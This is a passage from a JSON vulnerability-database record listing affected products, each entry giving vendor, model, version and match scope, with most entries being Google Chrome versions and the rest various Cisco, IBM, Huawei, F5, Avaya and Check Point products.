"version": "0.4.154.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.780.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.116" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.605.0" }, { "model": "t620 plus flexible dual core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1051.0" }, { "model": "physical access gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.51" }, { "model": "ipso r71.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "secure access link policy server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.49" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.55" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.663.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.537.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "phaser r14-12 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "6700081.140.105.00700" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1275.0" }, { "model": "oic v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.96" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.9" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1046.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.122" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "t610 flexible thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1062" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.934.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.490.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1020" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.469.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.9" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1080.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.67" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace uc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "2054-e11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.4" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "secureplatform r70.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.951.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.55" }, { "model": "gaia r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7775061.090.225.06200" }, { "model": "oceanstor s2200t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.0" }, { "model": "netflow collection agent", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.130" }, { "model": "infosphere balanced warehouse c4000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.414.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.55" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.332" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.85" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.108" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1050.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.479.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.11" }, { "model": "oceanstor s5600 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.960.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.838.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.394.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1" }, { "model": "oceanstor s2600 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.718.0" }, { "model": "secureplatform r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "uma-db v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.1" }, { "model": "oceanstor s2200t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "service control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.20" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.528.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.30" }, { "model": "rack server rh2288e v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.100" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.62" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491064" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.84" }, { "model": "sal gw virtual app", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.25" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1023.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.325.0" }, { "model": "high-density server xh320 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.33" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.57" }, { "model": "secure access core concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.46" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.724.0" }, { "model": "oceanstor hdp3500e v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.431.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.10" }, { "model": "configuration and orchestration manager com", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.47" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.51" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.406.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.938.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.515.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.36" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.2.1" }, { "model": "fusionaccess v100r005c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.91275" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.409.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.68" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.4" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.315.0" }, { "model": "network convergence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.741.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.170.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.588.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.75" }, { "model": "galax8800 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1045.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.799.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.104" }, { "model": "secureplatform r77.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1073.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.792.0" }, { "model": "secureplatform r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "ipso r71.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "storefabric c-series mds switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "gaia embedded r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.9" }, { "model": "uma v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.21" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "omm solution v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.322" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1279.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.272.0" }, { "model": "secureplatform r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.97" }, { "model": "gaia embedded ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "associates application performance management", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.411.0" }, { "model": "oceanstor vtl6000 v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.47" }, { "model": "elog v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.367.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1045" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1016" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.454.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.53" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "oceanstor s5800t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1029.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.2" }, { "model": "fusionstorage dsware v100r003c02spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.337.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.54" }, { "model": "message networking sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.43" }, { "model": "e9000 blade server ch222 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1032" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1302.0" }, { "model": "nexus switch for nexus series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v70004.1.(2)" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.51" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.945.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.1" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4" }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.895.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.355.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "supercluster", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, 